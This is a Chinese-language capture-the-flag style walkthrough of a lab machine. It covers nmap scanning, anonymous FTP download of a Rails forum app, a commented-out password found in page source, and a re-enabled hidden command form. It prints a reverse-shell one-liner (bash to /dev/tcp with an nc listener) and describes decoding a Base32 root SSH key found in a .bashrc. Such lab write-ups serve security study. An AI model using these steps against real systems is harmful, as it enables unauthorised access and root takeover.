主要知识点
观察
- 对于web page source代码的观察,寻找有价值的信息,例如注释,资源来源等
- 对于服务器环境变量的观察,.bashrc等,寻找有价值信息
具体步骤
执行nmap扫描,发现21端口的ftp服务支持匿名登陆,8080/28080端口安装了web应用,60022端口则为ssh服务.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 11:20 UTC
Nmap scan report for #remote_ip#
Host is up (0.00095s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 14 14 11 4096 Nov 06 2020 forum
| ftp-syst:
| STAT:
| FTP server status:
| Connected to #remote_ip#
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '#remote_ip#' is not allowed to connect to this MariaDB server
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 403 Forbidden
| Content-Type: text/html; charset=UTF-8
| Content-Length: 3102
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <title>Action Controller: Exception caught</title>
| <style>
| body {
| background-color: #FAFAFA;
| color: #333;
| margin: 0px;
| body, p, ol, ul, td {
| font-family: helvetica, verdana, arial, sans-serif;
| font-size: 13px;
| line-height: 18px;
| font-size: 11px;
| white-space: pre-wrap;
| pre.box {
| border: 1px solid #EEE;
| padding: 10px;
| margin: 0px;
| width: 958px;
| header {
| color: #F0F0F0;
| background: #C52F24;
| padding: 0.5em 1.5em;
| margin: 0.2em 0;
| line-height: 1.1em;
| font-size: 2em;
| color: #C52F24;
| line-height: 25px;
| .details {
|_ bord
|_http-title: ForumOnRails
28080/tcp open http Apache httpd 2.4.46 ((Unix))
|_http-server-header: Apache/2.4.46 (Unix)
|_http-title: html5-goku-en-javascript
| http-methods:
|_ Potentially risky methods: TRACE
60022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 76:61:5c:e1:8c:ca:14:e8:7a:63:ba:a3:46:9f:09:b3 (RSA)
| 256 e3:ed:fc:a8:10:d7:8e:b1:7c:de:a2:59:df:19:06:29 (ECDSA)
|_ 256 e5:dd:dd:a7:e3:ac:5f:b9:2b:4b:d0:27:e3:3c:c2:43 (ED25519)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.94SVN%I=7%D=9/18%Time=66EAB792%P=x86_64-pc-linux-gnu%r
SF:(NULL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.49\.54'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
下载FTP服务器的文件到本地,发现是一个ruby on rails 构建的web应用,搜索一下google,发现已经N多年没有人维护,粗略看一下,没有有趣的地方,也尝试用Gemfile中的ruby和rails版本搜索相关漏洞,得到的结果没有太多可利用的价值
wget -r --user="anonymous" --password="a" ftp://#remote_ip#
尝试创建一个用户来获得更多的信息,通过观察注册页面源码,发现有一段注释掉的默认密码
而注册后可以看到一个admin.forum发的贴子,点进去可以看到邮箱地址,组合起来就是登录所需要的用户名admin.forum@easysetting.com,而潜在的密码为 上图中注释掉的部分
尝试登录后,点击server status 按钮后,来到 serverinfo页面,观察源码后,发现一个注释掉的表单,看input name,也许可以执行服务器命令来建立reverse shell,
通过在web console编辑html页面,将上图中注释掉的部分复制到新的表单元素中,记得删除readonly属性
在本地启动nc -nlvp 9000监听,并在页面输入 bash -i >& /dev/tcp/#local_ip#/9000 0>&1 ,提交后得到reverse shell
通过观察 kathleen的.bashrc文件得到如下,其中最下面注释掉的部分很有意思,复制下来
利用CyberChef来尝试机密,尝试了Base64等编码后,发现是 Base32编码,得到一个私钥
尝试利用私钥+root用户 ssh到remote server上,成功
总体上讲,先后尝试了linpeas,pspy64,等工具去寻找突破口,都无果,都怪自己观察不够仔细,浪费了很多时间。
至于另一个端口,28080,则是一段动画,没有深入研究,不清楚是否是该靶机的另外一个解法